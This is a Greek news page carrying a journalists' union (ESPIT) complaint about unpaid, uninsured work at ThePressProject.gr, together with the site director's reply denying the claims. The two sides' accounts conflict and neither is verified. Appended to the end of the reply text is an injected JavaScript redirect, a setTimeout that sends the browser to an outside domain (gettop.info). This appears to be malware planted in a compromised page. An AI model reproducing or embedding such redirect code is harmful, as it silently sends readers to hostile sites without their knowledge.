Η ΕΣΠΗΤ καταγγέλλει εργασιακή εκμετάλλευση στο ThePressProject.gr – Απάντηση από τη διεύθυνση της ιστοσελίδας

0
4

 

Το Διοικητικό Συμβούλιο της Ένωσης Συντακτών Περιοδικού και Ηλεκτρονικού Τύπου (ΕΣΠΗΤ) καταγγέλλει τις επί χρόνια πρακτικές της ιδιοκτήτριας εταιρείας της ιστοσελίδας «ThePressProject.gr», σχετικά με το προσωπικό που απασχολεί.

Με βάση τις καταγγελίες των εργαζομένων, η εν λόγω ιστοσελίδα λειτουργεί τα τελευταία χρόνια και ιδίως την περίοδο 2015-2016 υπό καθεστώς συστηματικά απλήρωτης ανασφάλιστης εργασίας απασχολώντας δεκάδες εργαζομένους. Παράλληλα, οφείλει δεδουλευμένες αποδοχές δεκάδων χιλιάδων ευρώ.

Εκμεταλλευόμενη το καθεστώς υψηλής ανεργίας στον κλάδο καθώς και υπονόμευσης των Συλλογικών Συμβάσεων Εργασίας «εγκλωβίζει» τους εργαζομένους σε μία συνθήκη πλήρους απουσίας εργασιακών, ασφαλιστικών και συνδικαλιστικών δικαιωμάτων.

Στη συγκεκριμένη ιστοσελίδα δεν υφίσταται το στοιχειώδες: συμβάσεις εργασίας, με ό,τι αυτό σημαίνει για εργασιακή κατοχύρωση των όσων απασχολούνται.

Από το Φθινόπωρο του 2015 υπήρχαν συνεχείς οχλήσεις και επισημάνσεις των εργαζομένων στην εργοδοτική πλευρά προκειμένου να αποκαταστήσει τις εργασιακές σχέσεις στην επιχείρηση και να καταβάλλει τακτικά τη μισθοδοσία. Παρά τις συνεχείς υποσχέσεις για επίλυση των προβλημάτων κάτι τέτοιο δεν έγινε και οι εργαζόμενοι βρέθηκαν τον Οκτώβριο του 2016 σε μια αδιέξοδη κατάσταση καθώς τους οφείλονταν τουλάχιστον 7 μισθοί.

Καλούμε την ιδιοκτησία της επιχείρησης να προχωρήσει στην άμεση κατάργηση του απαράδεκτου εργασιακού καθεστώτος στο οποίο βασίζει την λειτουργία της και να προχωρήσει στην άμεση και πλήρη καταβολή τόσο των οφειλόμενων δεδουλευμένων αποδοχών, όσο και των αντίστοιχων ασφαλιστικών εισφορών.

Απάντηση από το ThePressProject.gr

Αγαπητέ κύριε Μπερεδήμα,
Με έκπληξη διαπίστωσα σήμερα ότι η Ένωση σας δημοσίευσε ανακοίνωση που μιλά για εργασιακή εκμετάλλευση στην ιστοσελίδα ThePressProject.gr. Αναρωτιέμαι αν είναι πάγια τακτική της Ένωσής σας να δημοσιεύει άκριτα χωρίς κανένα έλεγχο τον ισχυρισμό οποιουδήποτε, εφόσον ουδέποτε κλήθηκα να δώσω εξηγήσεις.

Η ανακοίνωσή σας, η οποία προφανώς βασίζεται σε παραπληροφόρηση, κάνει λόγο για υποχρεώσεις της εταιρίας «τουλάχιστον 7 μηνών» αλλά αυτό δεν είναι το μοναδικό ψέμα. Το πρόβλημα είναι ότι δεν επιδείξατε καμία διάθεση να ενημερωθείτε για τους ισχυρισμούς κάποιων ανθρώπων, οι οποίοι κατά την προσωπική μου άποψη, έχουν μοναδικό στόχο να βλάψουν την ιστοσελίδα. Άλλωστε κανείς από αυτούς που υποτίθεται ότι καταγγέλλουν απλήρωτη και ανασφάλιστη εργασία δεν έχει δεχτεί ούτε την στοιχειώδη επικοινωνία μαζί μας προκειμένου να λυθούν οι διαφορές.

Ως προς την ουσία της «καταγγελίας» σας ενημερώνω ότι δεν χρειάζεται να με καλείτε να καλύψω τις υποχρεώσεις μου. Πέραν του ότι ο ισχυρισμός για «δεκάδες χιλιάδες ευρώ» ακούγεται εντυπωσιακός, δεν ανταποκρίνεται στην αλήθεια. Η αλήθεια είναι ότι οι συγκεκριμένοι εργαζόμενοι προσπάθησαν να βλάψουν την ιστοσελίδα μας ενώ έλαβαν 3 μισθούς μέσα σε ένα μήνα και παρόλη τη συμπεριφορά τους ξεκίνησε η αποπληρωμή και του Οκτωβρίου, του τελευταίου μήνα πριν εγκαταλείψουν τις θέσεις τους.

Η υποτιθέμενη καταγγελία σας δεν προσφέρει τίποτα περισσότερο στο δημόσιο διάλογο αφού όλα τα στοιχεία της οικονομικής κατάστασης και της διαδικασίας πληρωμών, συμπεριλαμβανομένων και των αποδείξεων περί των κινήτρων των συγκεκριμένων εργαζομένων βρίσκονται σε δημόσια θέα με προσωπική μου πρωτοβουλία.

Είναι κρίμα λοιπόν η ΕΣΠΗΤ να παίρνει μονομερή στάση, χωρίς πρώτα να μου ζητήσει εξηγήσεις ή να μιλήσει και με τους άλλους εργαζόμενους του TPP προκειμένου να μην προχωρήσετε σε μια συκοφαντική δημοσίευση κατά του μέσου και του έργου τους.

Για τους παραπάνω λόγους παρακαλώ όπως συμπεριλάβετε στην ιστοσελίδα σας και την απάντησή μου και παρακαλώ να τηρήσετε τον κώδικα δεοντολογίας, αφού είστε μια ένωση που εκπροσωπεί δημοσιογράφους, ώστε να έχουν όλοι την ίδια δυνατότητα να εξηγήσουν τα πραγματολογικά στοιχεία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here